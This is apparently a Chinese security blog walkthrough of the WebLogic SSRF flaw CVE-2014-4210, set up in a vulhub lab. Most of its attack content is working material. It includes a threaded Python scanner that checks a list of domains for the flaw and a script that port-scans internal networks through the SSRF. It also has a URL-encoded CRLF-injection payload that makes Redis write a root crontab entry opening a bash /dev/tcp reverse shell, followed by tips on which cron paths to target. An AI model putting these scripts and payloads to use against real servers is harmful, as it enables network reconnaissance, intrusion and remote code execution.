WebLogic SSRF(CVE-2014-4210)

漏洞条件

  • Oracle WebLogic Server 10.0.2, 10.3.6

漏洞原理

WebLogic的SearchPublicReqistries.jsp接口存在SSRF漏洞,如果服务端或内网存在Redis未授权访问漏洞等则可以进一步打漏洞组合拳进行攻击利用。

环境搭建

直接使用vulhub:

https://vulhub.org/#/environments/weblogic/ssrf/

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。

漏洞利用

SSRF

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。访问一个可以访问的IP:PORT,如http://127.0.0.1:7001

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

此时返回的错误信息是:

weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code (Not Found).  Please ensure that your URL is correct, and the web service has deployed without error.

访问不存在的地址:

此时返回的错误信息是:

weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '7000'

可知二者返回的内容是不一样的,因此可以根据该差异来判断目标ip或端口是否是开放的,从而进行SSRF攻击。

自动化检测weblogic的ssrf(需要在当前目录下创建一个domain.txt文件,里面就写Weblogic的访问方式,保存为check_weblogic_ssrf.py)

domain.txt

http://your-ip:7001/

check_weblogic_ssrf.py

#!/usr/bin/env python  

# -*- coding: utf-8 -*-
import re
import sys
import Queue
import requests
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
queue = Queue.Queue()
mutex = threading.Lock()

class Test(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        
    def check(self,domain,ip):
        payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip)
        url = domain + payload
        try:
            html = requests.get(url=url, timeout=15, verify=False).content
            m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html)
            if m:
                mutex.acquire()
                with open('ssrf1.txt','a+') as f:
                    print "%s has weblogic ssrf." % domain
                    f.write("%s has weblogic ssrf." % domain)
                mutex.release()
        except Exception,e:
            print e
            
    def get_registry(self,domain):
        payload = 'uddiexplorer/SetupUDDIExplorer.jsp'
        url = domain + payload
        try:
            html = requests.get(url=url, timeout=15, verify=False).content
            m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html)
            if m:
                return m.group(1)
        except Exception,e:
            print e

    def run(self):
        while not self.queue.empty():
            domain = self.queue.get()
            mutex.acquire()
            print domain
            mutex.release()
            ip = self.get_registry(domain)
            self.check(domain,ip)
            self.queue.task_done()
if __name__ == '__main__':
    with open('domain.txt','r') as f:
        lines = f.readlines()
    for line in lines:
        queue.put(line.strip())
    for x in xrange(1,50):
        t = Test(queue)
        t.setDaemon(True)
        t.start()
    queue.join()

检测结果:

然后就是探测内网开放的ip和端口:

根据响应返回内容看到网络是通的,该内网IP存在Redis服务。

探测内网开放端口脚本:

import thread
import time
import re
import requests


def ite_ip(ip):
    for i in range(1, 256):
        final_ip = '{ip}.{i}'.format(ip=ip, i=i)
        print final_ip
        thread.start_new_thread(scan, (final_ip,))
        time.sleep(3)

def scan(final_ip):
    ports = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433', '1521', '3306', '3389', '4899', '8080', '7001', '8000','6389','6379')
    for port in ports:
        vul_url = 'http://xx.xx.xx.xx:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search' % (final_ip,port)
        try:
            #print vul_url
            r = requests.get(vul_url, timeout=15, verify=False)
            result1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',r.content)
            result2 = re.findall('but could not connect', r.content)
            result3 = re.findall('No route to host', r.content)  
            if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
                print '[!]'+final_ip + ':' + port
        except Exception, e:
            pass


if __name__ == '__main__':
    ip = "xx.xx.xx"  
    if ip:
        print ip
        ite_ip(ip)
    else:
        print "no ip"

可以看到检测出来的结果是手工检测是相同的:

接下来就是攻击内网的redis服务了。

攻击redis

Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

写入crontab计划通过bash反弹shell:

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/ip/port 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fip%2Fport%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.19.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

在Redis服务机子上成功写入crontab:

成功通过crontab定时任务反弹shell:

crontab写入Tips:

  • /etc/crontab
  • /etc/cron.d/*:将任意文件写到该目录下,效果和crontab相同,格式也要一致,并且在该目录操作可以做到不覆盖任何其他文件的情况进行弹shell;
  • /var/spool/cron/root:CentOS系统下root用户的cron文件;
  • /var/spool/cron/crontabs/root:Debian系统下root用户的cron文件;

参考资料

浅析WebLogic SSRF(CVE-2014-4210)

Weblogic SSRF漏洞(CVE-2014-4210)

Weblogic SSRF漏洞(CVE-2014-4210)

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇